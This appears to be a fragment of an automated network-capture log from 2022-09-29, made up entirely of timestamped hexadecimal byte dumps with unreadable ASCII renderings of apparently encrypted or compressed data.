                                                                                                                                                            2022-09-29 12:45:15 UTC25701INData Raw: a8 a4 84 30 4b e1 57 09 de b3 44 00 5c 25 40 9f 52 bc 82 55 74 76 d2 25 62 3e 3a 83 6a 1e f7 61 09 83 88 97 e5 eb da 78 26 ba b0 e9 f2 fa 2c 78 11 f8 57 79 d1 93 ec bc 74 69 97 3f a7 19 eb 70 aa 5b 76 49 af 5a e0 a2 8b 27 17 4d e1 4e 0e 4d c3 1c d1 ad d1 29 bb 98 a7 7a 23 69 1a ce 22 3a 8f e4 db b5 6b b8 98 db b1 0d 53 4e d0 6e 5e 0d 58 59 2d a4 ac fc 08 31 28 b9 c6 2e 36 15 3c 2a 95 b6 87 91 18 41 9e 6c 7d ee b5 15 cf 87 c7 0d 2d 52 31 c7 7f 8e 49 03 28 64 7d 15 09 d5 d1 55 35 95 64 73 7d cf 11 13 72 d7 e3 96 f3 a0 27 ca bc e6 3d 19 35 68 cd 88 57 2b e4 0e c8 00 54 fb 98 f8 ca 82 b5 64 e1 f0 fa e4 2c 1f 12 5c c9 f0 fe b4 81 28 d3 97 c8 c6 e1 72 86 a9 18 81 ad 5c 41 b4 ae d4 a9 84 d4 6f 20 b4 2e a6 bf 8b 6a 6c 9c 0e 6c 90 9e e8 9e fc e1 5c d7 97 1a 58 b0
                                                                                                                                                            Data Ascii: 0KWD\%@RUtv%b>:jax&,xWyti?p[vIZ'MNM)z#i":kSNn^XY-1(.6<*Al}-R1I(d}U5ds}r'=5hW+Td,\(r\Ao .jll\X
                                                                                                                                                            2022-09-29 12:45:15 UTC25717INData Raw: 69 72 b3 51 24 fc 2f cb 05 1c 68 e7 73 7a 6e 26 72 25 4c 77 b3 78 e2 94 66 dc 56 ae 60 c4 80 6c d9 c2 25 87 ac 61 83 6b 1b 4c dd 52 ca 1c 9c 80 9d 30 36 28 4d 57 85 ef 12 be 55 a5 7a fb 6e 43 7e c7 1d a9 c7 24 db 9c 2b 6b 97 e5 94 ca 4b 43 dd 08 37 b0 5f ab 83 da a4 6e af 5a fa 39 db cb 96 5e 01 e4 c4 aa 3e a4 fe 13 85 62 af fe 66 8b 35 e5 df a4 69 d5 27 95 df e3 cb 34 98 c8 48 41 3d e1 7a eb 30 1d 53 b9 39 70 b3 12 44 4c 65 db 55 29 34 fe 89 67 bc 83 7f d6 d2 7e 0d a3 9b 14 c6 9e a6 e2 9c 7d 45 ea d6 b0 51 5a b4 de 58 56 6f 94 40 d4 ca 7b 13 1e 44 b6 22 29 f0 ac 07 53 8c 02 ee d3 84 98 9e b2 79 5a 54 98 53 50 91 62 ef 5c 41 68 11 aa b8 60 29 d4 91 62 a2 6e fd 07 f1 0d b5 75 2f 59 b5 cf 61 1e d5 ea 8f be fb b0 b3 e2 19 24 ff 72 ed 09 50 3e aa a7 b2 a8 09
                                                                                                                                                            Data Ascii: irQ$/hszn&r%LwxfV`l%akLR06(MWUznC~$+kKC7_nZ9^>bf5i'4HA=z0S9pDLeU)4g~}EQZXVo@{D")SyZTSPb\Ah`)bnu/Ya$rP>
                                                                                                                                                            2022-09-29 12:45:15 UTC25733INData Raw: 57 1f 84 32 e7 0e 17 8b 4b b2 3d 81 78 20 a4 cc 18 4c 1a e8 7c 97 d9 b3 79 76 4d b5 f3 81 0d ec 09 8f 36 e0 f8 8d 84 b2 af 26 42 6a 14 3b 68 82 9f 5d f9 00 cf b6 4b e6 9f 73 32 20 a7 23 32 13 25 c0 56 78 0d 64 ee 05 fa 10 f1 5d c8 e8 a2 7a 4b ee a1 ee 81 31 09 5a 34 cd ef 5c fe be 4d 7d 74 6f f8 93 4f 04 73 69 bb fe b0 b2 64 12 b8 71 6b 73 2c 89 b2 61 8b 34 af 86 22 e1 ee 14 f6 dd 49 62 3e c2 3b e0 26 e0 9f 32 41 47 b8 8e 83 3c ae 02 58 7a 51 ae 21 19 f7 bb 79 6c a7 51 75 b8 e8 e4 24 d0 00 01 e1 1d 0f c1 99 f7 f3 1b 14 fe 20 17 9e a6 db 34 12 ea ea ba 5d c4 4a 20 59 5b 49 c3 e8 54 ea 4e 65 bd fd ab 58 c3 fa cc 9e e1 77 f8 48 f3 a6 66 5e ed dc ac f1 e4 ad 24 c0 62 6d 42 ee 2a be fe 34 12 21 2b 60 dc 47 41 94 2a b6 36 05 d7 bc 8c 70 2c e6 4b 5d 7e 64 36 68
                                                                                                                                                            Data Ascii: W2K=x L|yvM6&Bj;h]Ks2 #2%Vxd]zK1Z4\M}toOsidqks,a4"Ib>;&2AG<XzQ!ylQu$ 4]J Y[ITNeXwHf^$bmB*4!+`GA*6p,K]~d6h
                                                                                                                                                            2022-09-29 12:45:15 UTC25749INData Raw: 2c 35 33 00 eb 7a e4 3a 39 d6 7e 42 53 07 f5 e8 56 4f b3 d4 83 8f 63 2a 66 3d 57 19 00 bd 34 ee b8 06 27 4d cd e0 84 c7 53 ee 26 b1 a3 a7 f5 3c 40 3a 9f 1f 6c 83 ee e5 1d 45 ea 89 bf ad ee 28 65 0c 31 98 c6 1a 77 17 09 23 f8 b3 ef 38 c9 1c a2 7e bb c6 0d ab 54 d9 6a 75 e9 3d a9 2b f6 04 e4 87 b7 23 84 02 a2 53 c8 76 70 72 03 55 6e 9e af 32 a2 3b f2 d4 c5 ef 66 a2 60 2a 22 74 0e c5 a7 20 2e b5 4c 84 31 e9 18 7b 6c c3 61 ab ee 28 a0 a0 8d 81 c3 14 ed 56 45 05 50 9e 94 62 c3 d7 4d 2e fa 3e 17 d1 dd 09 44 9d ad 67 d4 2d c7 2d 51 5a 16 b6 e2 77 98 9b 08 ef 97 ed d1 25 0d 9f 81 08 da 7b 39 1f ee cf c4 aa d7 5f 50 f4 11 fa fd d3 ac 08 e4 67 e0 1b da a7 2e 5a 35 f6 e0 ea de cb c3 c6 7f 7a 98 b8 e9 68 c7 e5 4f 44 cd e6 37 3d ef b9 eb 86 af a9 aa 00 d9 ba ce 12 dd
                                                                                                                                                            Data Ascii: ,53z:9~BSVOc*f=W4'MS&<@:lE(e1w#8~Tju=+#SvprUn2;f`*"t .L1{la(VEPbM.>Dg--QZw%{9_Pg.Z5zhOD7=
                                                                                                                                                            2022-09-29 12:45:15 UTC25765INData Raw: 51 2a 58 8b 24 d7 04 f6 59 42 78 4f 26 d6 de 75 8b c6 f1 95 5e 3d 7a 9f 2c 68 83 c2 8c 83 7a 63 71 4d 06 5d 58 c6 57 8f 54 7b 29 2d bd 53 5f 52 56 1e da 49 af f6 5b 0b 49 a1 58 97 fb 17 ba fe 2a ce 0d a6 b8 8f c7 08 51 dd 98 43 58 f4 44 e9 9f a0 60 0d ab 3c 9c 68 94 5d 12 db 7c da 79 39 97 21 6d 4b 6c 7e f3 36 29 4f 56 08 2b c1 24 49 65 b0 af 40 35 32 81 9e f5 01 b7 27 0c db b9 0e 43 91 fe 32 49 63 43 9a 7f 96 4f 5f 15 6c d5 1b 0e c7 5a ee eb d3 6c 27 a7 86 2c 07 25 f2 7e fe 63 f0 7c b2 30 2f e7 9a 6f 75 f0 ed b3 b2 27 40 ac 79 44 83 8c 41 34 24 80 7c 8d eb c9 1a 2d f6 6a fa 45 15 fc e9 c4 b8 38 c2 7e 36 49 df 53 77 10 b1 f3 5c f4 b7 c7 5d 6c ce 26 69 55 33 47 84 5e 0e 44 f3 2f eb fe 33 5d 72 84 99 97 dd e2 a7 36 59 77 8e 98 84 08 21 af f2 91 e7 88 40 d5
                                                                                                                                                            Data Ascii: Q*X$YBxO&u^=z,hzcqM]XWT{)-S_RVI[IX*QCXD`<h]|y9!mKl~6)OV+$Ie@52'C2IcCO_lZl',%~c|0/ou'@yDA4$|-jE8~6ISw\]l&iU3G^D/3]r6Yw!@
                                                                                                                                                            2022-09-29 12:45:15 UTC25781INData Raw: 41 11 e1 46 43 fe 00 dd 2c ef 90 ea 19 bc 76 1b 3f c4 b8 d1 47 37 b4 9d c2 9d d0 b9 3a 4d 8a 50 6a 77 d2 8d ac 28 c4 cc 11 75 45 72 9a 8c 8d 99 dc 2f 3d be bf e0 35 90 e4 d6 7a a3 a6 60 af 9d 09 69 17 44 24 bd f2 54 f5 99 46 c8 7f 46 d4 84 4f ac ef 24 b5 4e 11 15 63 c9 f9 f0 37 6a 0d aa db 85 70 d0 77 34 83 20 3f 7e 4a e2 a7 28 19 ca b1 a4 e3 16 bf 78 10 9e 53 95 32 0e 65 eb 1a 50 25 d1 6f f6 1b d5 83 ff 1a 9f bf 37 8d 51 15 f8 0f 3d 41 a4 5a e5 30 26 02 0b 23 68 33 b0 c0 ce bb c4 50 e3 5b 06 19 7a 07 7f 17 6d 7f e7 89 ee 83 68 b0 69 97 6f 21 28 53 5d fd 9a 58 09 40 01 5b 99 d5 d3 fc 05 51 20 97 85 40 2c 90 cc 81 e9 92 b4 05 8a fc d7 e2 1a 32 3c 29 37 b7 8b 8b b2 5b 10 22 b9 c0 28 df 5d eb 77 c1 d8 78 65 56 c2 c2 54 00 cb 81 9f e0 c7 e8 c5 af 8a 19 cb d2
                                                                                                                                                            Data Ascii: AFC,v?G7:MPjw(uEr/=5z`iD$TFFO$Nc7jpw4 ?~J(xS2eP%o7Q=AZ0&#h3P[zmhio!(S]X@[Q @,2<)7["(]wxeVT
                                                                                                                                                            2022-09-29 12:45:15 UTC25797INData Raw: 5a be 6b 11 3f c2 7e 00 21 d4 83 d2 d6 47 76 eb 08 e8 3d da 14 c3 b5 6b f6 71 d4 3b b2 31 84 fe f9 24 a9 c3 78 e3 db fd 72 f2 42 bb 60 ab 9f 69 1e b5 00 54 f8 8a 3d e0 95 e3 e9 e9 b3 95 a3 b4 24 bf 2a 15 f7 6c 56 b0 45 e6 d9 91 4b 80 de 13 f5 e9 40 6c 87 fb 75 57 ad 8d d0 64 e8 80 43 87 af 62 08 a1 1b 6a 97 ec d5 e1 81 11 c6 b0 66 9c 83 e6 78 ac 46 13 2c 34 90 0b 98 1a 70 30 e1 69 ce dd 5f 88 37 56 88 b3 9a 56 7f b2 92 01 39 96 84 69 78 92 55 ae 25 58 57 13 2c 8e 72 57 58 38 82 50 81 27 a3 14 aa 59 19 cb 16 6e f6 87 5e bc c0 9a 28 4f f8 ff 13 62 e1 c6 0d 03 4e 98 3e ad d6 e6 73 0d 5a 62 96 19 12 77 79 c7 f3 67 18 66 3d b0 10 85 cd 4a 8f ae 0a 23 48 f7 b8 8b 12 62 29 62 55 19 5c 34 27 4f 59 a9 fb d1 25 c1 90 55 04 90 59 3b f4 c4 71 3b 99 fe fe 79 31 44 a4
                                                                                                                                                            Data Ascii: Zk?~!Gv=kq;1$xrB`iT=$*lVEK@luWdCbjfxF,4p0i_7VV9ixU%XW,rWX8P'Yn^(ObN>sZbwygf=J#Hb)bU\4'OY%UY;q;y1D
                                                                                                                                                            2022-09-29 12:45:15 UTC25813INData Raw: 84 b8 5b 06 bd 45 5f 85 6c 60 19 f9 37 9e 5d bb fd 05 93 99 da c3 e0 f0 d3 c8 17 ee 22 f2 37 8e be b7 ae ef 1e 92 44 33 85 d2 b4 7d 52 0c 97 1b 5e a9 0b 1e 4e 93 12 ea 7b e5 af 10 2a 9f a7 e9 40 e8 9f 72 8f 2c c0 f9 c3 c0 09 86 85 34 b3 71 26 0d 65 2d 65 c5 b1 53 01 a4 a9 57 33 62 57 8c fc 8e dd 0d d1 a6 cb 2f 00 17 de 17 f9 78 49 7b 0e e3 10 36 e8 07 96 5c be 49 c4 8e c1 2e f6 e6 52 c0 d3 62 1e c3 2e b4 b6 a6 0c 3f 8d a1 48 d9 10 78 46 d6 25 6e 6f 13 6c 92 c4 cf b8 d5 71 c1 bc 94 82 d7 3f 1d 2f e1 10 77 8f 9f 24 de 9b d5 e0 a7 8f b8 3f da f7 1f 82 1a 99 9a 6f ea 1b 0a 78 20 b6 83 a1 c5 45 77 4c ec 2a eb 9b e2 f8 90 ca 31 ca 09 d5 74 b0 e7 0f e8 f3 a3 ea 29 21 96 54 c7 82 b6 2c dd 39 79 35 62 20 5e 45 03 d9 5e 3e 7e 85 fd 61 e1 44 17 7a 3d 87 14 1b 8b cc
                                                                                                                                                            Data Ascii: [E_l`7]"7D3}R^N{*@r,4q&e-eSW3bW/xI{6\I.Rb.?HxF%nolq?/w$?ox EwL*1t)!T,9y5b ^E^>~aDz=
                                                                                                                                                            2022-09-29 12:45:15 UTC25829INData Raw: 1d fd 36 5e e4 90 e3 6b 03 ae f5 77 66 6b ac bf 0e 62 44 e7 3b 4d d3 d0 28 6f 61 79 dd 20 4e 6d 50 b3 1a 27 d7 af ee 52 73 8d 32 b0 81 03 f4 c0 c1 57 3a 3c f7 4c ea d3 91 50 df f2 13 35 a7 33 f2 c3 cf 12 96 23 d3 7f d2 7e 98 ff a1 89 59 2a d1 67 65 97 1c 13 dc 0f 5e 4c df 46 89 45 c5 50 04 2b 3c d0 7c 9f 49 56 dd 7d 30 51 24 fc 58 15 73 77 79 07 24 92 72 bd e2 d4 30 6b ac 30 e7 19 0e 7a d6 8f 86 72 6d 76 b7 9d ec ba 32 59 d9 ce 44 d3 87 58 c4 cf af 8e 60 51 2f 56 82 07 8d af 0e d3 2c 52 37 97 e3 1a 08 13 0a 37 f3 1f 4a 0f 5d ec 9a 54 9a d3 30 7c 7a 87 47 ca 98 9c 27 95 d3 66 0c 7c 99 02 c1 f6 e5 dd 6d c4 84 7d ad 71 9e ce cb 9a 9f 4f 1a 9d c4 b1 11 0f f1 df a2 6b 17 d9 ee 3f 49 98 26 2c a8 ad dc 8e d7 56 6f d6 b7 55 bd af 50 5d 4a 59 5c 59 dd 0e 5c 9a 71
                                                                                                                                                            Data Ascii: 6^kwfkbD;M(oay NmP'Rs2W:<LP53#~Y*ge^LFEP+<|IV}0Q$Xswy$r0k0zrmv2YDX`Q/V,R77J]T0|zG'f|m}qOk?I&,VoUP]JY\Y\q
                                                                                                                                                            2022-09-29 12:45:15 UTC25845INData Raw: 93 b2 f7 18 b8 82 83 d3 98 dd 1a e2 73 ee e2 b3 55 e5 08 61 c2 6c 23 3f 44 6e ea 77 66 b6 e0 a4 d4 77 51 30 6d 55 ab 23 a7 0f b8 3b 9b 19 7a 1b 21 4e f7 a7 62 30 20 a8 c2 a2 12 9f 32 79 ea 3e 7a a6 80 c7 1e 91 29 cf 90 47 78 f6 55 ad fb d6 55 5f 96 df 01 7d e9 3a 42 29 3c cb dd 0a f2 74 ff 98 24 c3 41 7c 03 27 18 5d 37 a9 a5 d8 d4 d6 e2 e9 e5 1f d2 6b 28 7f 42 7d e7 86 23 bb a3 2a fa ed fb ae 58 29 85 12 e6 31 fb 8d 01 e8 79 99 54 da c8 2e 9e e4 0e cf ad d6 82 e0 c5 77 a7 e9 21 15 d6 15 96 f6 0e 91 dc 3b 40 6a 99 08 9c b6 19 90 5c 03 58 4c d4 e0 f4 1e 0b 8f 30 6e 57 1f c6 17 b5 b3 e7 17 d1 d9 cf 33 7d eb 2a 8e bb 63 19 d3 bd 73 f3 18 a7 4f 16 11 0e f3 73 0a 61 de 62 1b 7f 16 ad 01 3d 92 c7 8b 25 69 50 6f d1 4f 8b ce 99 40 8b 0d 95 31 8a 70 cb 8b 14 d8 7e
                                                                                                                                                            Data Ascii: sUal#?DnwfwQ0mU#;z!Nb0 2y>z)GxUU_}:B)<t$A|']7k(B}#*X)1yT.w!;@j\XL0nW3}*csOsab=%iPoO@1p~
                                                                                                                                                            2022-09-29 12:45:15 UTC25861INData Raw: ea ba 5c d8 13 d2 29 94 e0 6f 5e ea f9 b5 57 90 d4 15 3b 74 7c 90 66 5e b7 98 58 72 2c 12 8e a7 af 7e cf bb 2e 30 72 ec d6 3d a2 33 da 94 40 78 67 a5 0c 65 8f ac cd 36 d0 26 8b df 55 54 8a d5 b3 a6 71 d5 f2 a3 68 d9 18 5c 1c 07 9c bf 4a 19 50 74 52 17 95 37 5f d7 63 27 67 b9 4f 54 e2 f2 70 d2 e8 0a 07 52 24 b9 2b 32 f4 f7 a4 c7 ac 36 bd 09 00 b5 f4 0a 75 5f dc f9 7c 2d 77 ea 68 aa 88 6d 3b bb 74 77 c7 bd d3 9a ce 79 63 a9 1a b7 28 76 dd 4d e8 d7 95 9f 5c be a0 27 38 a6 25 94 d8 af 48 fc 6b 9d a7 d1 af fc d3 a5 a0 5a e0 90 a6 57 43 29 3f 77 db 24 63 df 8e 16 f2 40 e8 e9 9a db d3 70 4f 01 06 d9 bf 37 81 35 b4 30 c4 0a e4 6f 12 ef ef 26 db 32 19 84 c5 f9 a2 67 d3 7c 1c c8 a3 26 3b c7 f6 f7 a9 2f cb be c6 39 d3 01 51 e3 76 dc 45 31 28 84 5b 1b 3a c9 ad f8 3b
                                                                                                                                                            Data Ascii: \)o^W;t|f^Xr,~.0r=3@xge6&UTqh\JPtR7_c'gOTpR$+26u_|-whm;twyc(vM\'8%HkZWC)?w$c@pO750o&2g|&;/9QvE1([:;
                                                                                                                                                            2022-09-29 12:45:15 UTC25877INData Raw: 0c ab 3d 27 46 77 64 61 e9 62 43 ae 65 87 75 63 da 93 2f df cb f2 69 0e 03 00 bf 61 59 44 42 58 5e 2d e9 12 6e 5d 3a 13 d2 ca 70 87 65 39 5e 79 0e 57 0d bc 8d d5 0a 33 f6 01 7c bc 08 a8 de 97 87 e3 98 68 3b a0 98 38 6a a0 89 d4 3f c5 18 da a8 3f 00 ab d1 7b 8e 2e a3 38 2b a2 c9 29 bc 5d ff f8 26 68 19 c6 8d b7 08 51 85 c1 da 2b fc b4 74 be da dc 17 23 36 77 6c c7 be ec 36 0a 8d 8c 93 49 04 62 a4 74 a7 ee 9e 78 d8 40 fa 4f ef 2c 1c 35 dd 8c 28 83 d4 c4 2c fd 45 01 d3 cc 3b 2f 6b ff 20 3a cb 1e 4b 98 4a e6 8a ee 4a 4b c4 52 97 23 37 9d 4d a8 7c 9f b4 91 fe 87 c0 15 d9 99 db cb da b5 b0 99 36 f1 dd 35 e6 f5 a0 4c 93 43 81 7a 1a 59 f6 f8 f7 42 10 11 22 fd fa 8b b6 27 e0 97 ea d3 4b e8 e1 25 f8 bc 63 09 c9 74 b0 38 86 fd 09 14 65 c0 23 1b c0 aa f9 7e 13 dc 96
                                                                                                                                                            Data Ascii: ='FwdabCeuc/iaYDBX^-n]:pe9^yW3|h;8j??{.8+)]&hQ+t#6wl6Ibtx@O,5(,E;/k :KJJKR#7M|65LCzYB"'K%ct8e#~
                                                                                                                                                            2022-09-29 12:45:15 UTC25893INData Raw: 9d eb 8a e1 71 eb 86 17 e0 26 75 12 5e 46 0f 5d db d4 f5 3a 79 c9 e6 68 15 3c 12 70 d7 d5 bd 59 b2 f4 8e 44 85 df cc f2 44 b3 55 d1 71 0c fe ee 8c 33 58 83 ec 2b b0 97 5f c5 da 6f be e1 08 88 c2 3a 70 87 07 6e 1f b2 e1 02 cb df 26 4f 57 0d 90 94 5d 0c b3 21 39 75 a0 3d 2f f0 1d aa 0f 71 10 98 12 fa 83 c9 1a 46 79 19 87 a0 ad 5d da 69 41 a0 c0 da b1 eb 92 26 8a a9 8b bb a3 1c cd 9c 94 47 88 fe 41 ed b4 19 be 93 7b 0f 18 68 b4 43 67 58 91 94 51 cf 67 80 6e 02 a7 e2 ad 67 df 79 95 93 ea 2b 45 f2 4c b9 45 97 62 cf c1 63 22 b3 11 f0 0b 18 1c ae 2d 1a 2d 09 b1 f9 d3 13 16 8e c2 66 5d ee e0 45 57 b6 99 df 0f 53 c6 3d 7d 3a 9d 56 d6 bc 6e dc 91 c0 37 df bb 08 37 9b 35 0b 5d ce 64 0b 7b fb de 64 76 f0 5f d0 6b e7 dd 81 5d ca 99 74 99 00 e7 61 4a 35 8e 55 e8 ca 3e
                                                                                                                                                            Data Ascii: q&u^F]:yh<pYDDUq3X+_o:pn&OW]!9u=/qFy]iA&GA{hCgXQgngy+ELEbc"--f]EWS=}:Vn775]d{dv_k]taJ5U>
                                                                                                                                                            2022-09-29 12:45:15 UTC25909INData Raw: a2 ce 7f 8e c0 79 54 71 e6 91 ca a3 1b 93 e9 a9 17 62 e4 22 e8 30 c4 3b 7d 0c 77 e1 fe e3 92 12 ee 0a 9c 1c c8 82 04 1c 03 67 f6 0e 89 87 74 90 d7 af 7d 51 5e 84 a1 e1 a1 9b 9f e4 17 b9 19 b8 50 da 66 0b 0f 66 77 dc b2 7f 94 76 d6 b6 24 11 04 02 88 8e 0c da 56 aa 6a 08 55 b7 12 f2 e6 01 2c 45 64 4f a6 bf 4d 9c 08 44 0a 8a ad 7a 54 92 0f a2 02 36 71 3d 1b 86 1a ca 4e 61 3d c3 12 7b 14 ec bd 2c d3 cc 12 e0 8a 20 8f 91 44 a2 c8 11 b7 da 27 74 dc 2a c8 0a 97 70 42 05 04 f2 b7 40 ed 82 3c 1f ba dc 2e 48 36 11 e0 26 5e ff 6f b9 98 c2 cc 1c ca c0 e4 28 d5 e8 32 c4 ae da 87 98 fc 51 36 50 55 39 e3 b1 1e ef e2 0d d3 0b 62 78 52 22 a9 0c cd 2c ec ff 36 36 d4 a0 9d 75 ac ad b0 67 19 0e 5d 12 ac 95 3b 35 2b 9e 45 0b 94 c2 f1 94 c0 53 aa 67 a6 bd 82 db c8 d1 3e 38 d7
                                                                                                                                                            Data Ascii: yTqb"0;}wgt}Q^Pffwv$VjU,EdOMDzT6q=Na={, D't*pB@<.H6&^o(2Q6PU9bxR",66ug];5+ESg>8
                                                                                                                                                            2022-09-29 12:45:15 UTC25925INData Raw: 0d 4a af dd b9 a5 34 7c 89 e5 3b bc ff 73 67 90 7f 13 be d7 be 79 ef 5b e2 ea fd 32 9c cc 12 f3 ff c7 66 08 39 7c 83 6f c6 d0 e6 3a c9 8c f3 b9 84 10 80 9d 77 1d 86 93 b1 65 fa 3e 29 be c6 0d 4f eb 56 66 a0 5d 6a f2 33 8b 07 e5 59 e5 80 c5 15 09 41 17 07 9c 26 6a 1b 6d 74 ed 1a 97 78 83 a4 c8 2d 1f 8a d2 5d cb d9 64 88 79 2e 95 5d 9c 4f d3 27 79 6c ab 45 ba 39 44 cb d0 79 7d f0 74 ad f6 e5 c3 7a 07 44 a0 9f 71 aa 37 28 a3 a7 a6 2b 23 07 96 29 b8 2a 34 1c 0a fb 6d 82 b5 5a 41 e3 50 a8 93 52 85 8e 17 27 be 81 19 92 ed 1f ac 1f a1 68 4e 88 e9 09 b9 35 19 7d d1 77 8a 2c 6c c2 1c c4 f6 62 fc 99 ca 84 3b cf 4d 54 2a 75 28 48 9f 6f 07 39 36 28 ed ae ff 00 f8 18 db c9 25 e6 42 2b 6d a5 f6 1b 39 1f 15 f6 7f e8 1c ef 2a b5 52 b3 bd fc 1f 24 a5 5e 3a 89 a9 c7 28 94
                                                                                                                                                            Data Ascii: J4|;sgy[2f9|o:we>)OVf]j3YA&jmtx-]dy.]O'ylE9Dy}tzDq7(+#)*4mZAPR'hN5}w,lb;MT*u(Ho96(%B+m9*R$^:(
                                                                                                                                                            2022-09-29 12:45:15 UTC25941INData Raw: 5c 32 11 14 f3 1f 6a bf 1d d7 08 eb 3e b9 da bf 3d 38 bb 64 9b e3 d6 d3 d0 70 23 09 4b 21 1c ed f7 d6 00 75 c7 9a f9 9f 0a 61 25 d1 73 b1 41 0a a4 0b 86 ba e9 fb de 06 ea d8 8f 69 5f 8d ba e3 8c ce 09 f6 30 a9 5f 21 c0 68 de f1 a8 01 1f ef 5e 5d 31 29 be 6c 4d e0 d6 63 5a 0b be d3 65 17 7e 09 56 8a 95 bd 38 6e 8f 65 42 40 c6 0e 1f 79 84 f8 7d 64 9b 7e 68 ee 30 bb f1 63 56 ee 1d f0 e6 6c 0d 97 c9 ad b5 3e 03 cc ca 70 43 77 7f 1d 34 0f 92 a9 26 ce 5c be 2b b2 0c bd 55 e0 35 43 e7 f8 76 d8 61 56 a9 df 9f be f7 f7 7b 34 8b d4 1e 4f a6 6f 3b 8e 39 f3 e2 ee 97 c6 1d 84 13 2b 0d 5a 3e 35 d9 aa 7f a5 a4 a6 eb 25 30 b8 72 32 a4 50 47 e3 52 7e b3 b7 eb 27 11 aa e0 03 1b 51 db be d6 90 8e 54 06 b3 77 5d d7 46 0f 40 a9 7d ba bd b7 96 d9 ca 81 4b 2f 80 86 f7 8c 61 70
                                                                                                                                                            Data Ascii: \2j>=8dp#K!ua%sAi_0_!h^]1)lMcZe~V8neB@y}d~h0cVl>pCw4&\+U5CvaV{4Oo;9+Z>5%0r2PGR~'QTw]F@}K/ap
                                                                                                                                                            2022-09-29 12:45:15 UTC25957INData Raw: 87 3d f5 36 c8 0f d8 89 84 0c e9 ec 9a 31 39 0c 10 85 d4 25 bc e8 16 42 ab f8 12 9f 5e bd 57 50 71 c4 ad 97 03 80 f8 70 a7 d3 01 71 70 f5 96 4a 2d fb 9d fd c1 62 58 3e 67 cb 0c 03 66 65 cd f1 b9 ea a5 08 ae d3 ef 6c 17 7c 50 69 9b ca 40 bf f8 6c 96 d1 3a a5 a7 e9 ee 9e ba c0 64 d5 d4 5b ac 9b a1 ac ce b8 c8 71 23 74 6c d9 e1 c4 2d fe 51 13 4e a2 9a 3e 74 4d d5 d1 6d 49 62 d5 2b f3 19 e2 37 b2 fb 27 44 ea 60 5a 1a 26 5e 57 db 93 1a 44 82 54 e1 c4 d7 ea 9d 46 dd 52 b5 1a 89 a5 4d 60 5b 90 b5 03 59 d6 a9 be 4b b7 24 53 29 34 93 b9 7f c2 cf 81 84 f2 7c 9c cc a7 32 18 5e bc 3e ee aa ce 45 94 29 bd 25 92 18 46 0e 6c 99 7c de 0f 86 97 41 d6 d2 82 e7 16 2b e8 7b 37 23 0f ee 6f 5c 1b 6c 1a 7d 78 5c 0d c1 18 ef 47 1d 82 68 64 14 7c a9 cc ef 09 1d 16 e9 3a 50 08 a2
                                                                                                                                                            Data Ascii: =619%B^WPqpqpJ-bX>gfel|Pi@l:d[q#tl-QN>tMmIb+7'D`Z&^WDTFRM`[YK$S)4|2^>E)%Fl|A+{7#o\l}x\Ghd|:P
                                                                                                                                                            2022-09-29 12:45:15 UTC25973INData Raw: 5d f9 2a 32 c6 04 c0 e5 4e 82 77 53 aa 35 88 86 f1 be a1 04 cb 75 5d 01 70 83 28 0f d8 5f c5 18 af b5 81 a6 66 2e e8 14 69 d3 19 57 8b 56 d4 3c 15 2a 0d 52 91 fd 19 54 e9 e2 26 f2 5a 73 df f0 73 86 9a 43 56 c4 3b 6b 6c 2a b5 9a ca eb a1 ee 94 53 77 64 63 33 c4 06 52 48 de 4b 0c 40 0e 68 1c 39 1c 5d 00 5f 17 5f 20 c0 d7 a6 e3 ab 67 ce b6 72 4e 5c 2d 7d eb f6 78 b4 91 b4 38 f0 f9 d8 04 37 62 0a 6a ea c0 bf 35 38 23 20 c8 6a 88 e1 96 b9 7f a9 d5 ee 61 49 80 4a 43 11 bd 0f 19 56 4f 1e 18 40 a5 64 22 8e df c0 ca ea 3b fc 34 6d 1b b8 67 fb 75 bd 5c 8a 3a 39 b9 60 e0 0a df 25 04 8b 3b c2 da ad d5 d8 bc be 14 69 47 1e 23 b7 ce 55 b1 f9 bb 16 33 17 62 02 c4 9d f5 43 32 95 75 3c 10 74 f9 69 7e c8 09 47 ca 6b 2b 48 2c 4b 80 48 2f 54 1d 4f ae e3 55 77 e1 aa 9d 61 25
                                                                                                                                                            Data Ascii: ]*2NwS5u]p(_f.iWV<*RT&ZssCV;kl*Swdc3RHK@h9]__ grN\-}x87bj58# jaIJCVO@d";4mgu\:9`%;iG#U3bC2u<ti~Gk+H,KH/TOUwa%
                                                                                                                                                            2022-09-29 12:45:15 UTC25989INData Raw: f4 30 1d 69 b9 c2 12 d8 3b 30 05 cf 3b 1b d4 53 6c 2a f0 e4 b3 1f 5e 98 03 38 6f 0a 76 26 d9 30 ea b3 e5 24 88 9c 02 fb 78 6f 42 24 cb ce c9 cc 87 3e 7f d5 27 42 5c c6 84 d0 99 0f 52 5b c4 2a d4 8d 47 74 7f c1 55 66 eb 47 95 e1 b6 de 27 a6 60 d2 41 13 77 cc 11 ef 3b 26 e1 de fa 8b 63 da 42 63 a5 88 2b 02 b1 4c d2 cb 82 92 78 36 cf 08 71 19 76 d2 a1 42 9a 24 f2 0d 66 69 90 cb 76 f5 fd 57 eb 55 f1 b6 96 c3 5e 9d f9 60 99 77 8a f0 f0 72 e2 b0 3e 8b d3 20 fa 18 c7 3d e6 57 8d 3f e5 f5 f1 51 1d ee b0 84 22 5c d7 31 a2 89 8a 12 80 ed ef bd 9b ca 5b c2 a4 e6 d1 c1 3f 65 04 0e e5 af 34 85 5e 3c ed aa f7 e3 f3 91 3a d2 81 36 72 a0 05 a3 8c 2c e2 8c 04 86 43 0a 03 b3 04 b9 a0 c5 06 a6 25 ea c1 b5 7e db 5d 6a 1a f8 ff 9f 2d f3 3c 07 50 7e bc 73 9a 67 9c d9 db 5e b4
                                                                                                                                                            Data Ascii: 0i;0;Sl*^8ov&0$xoB$>'B\R[*GtUfG'`Aw;&cBc+Lx6qvB$fivWU^`wr> =W?Q"\1[?e4^<:6r,C%~]j-<P~sg^
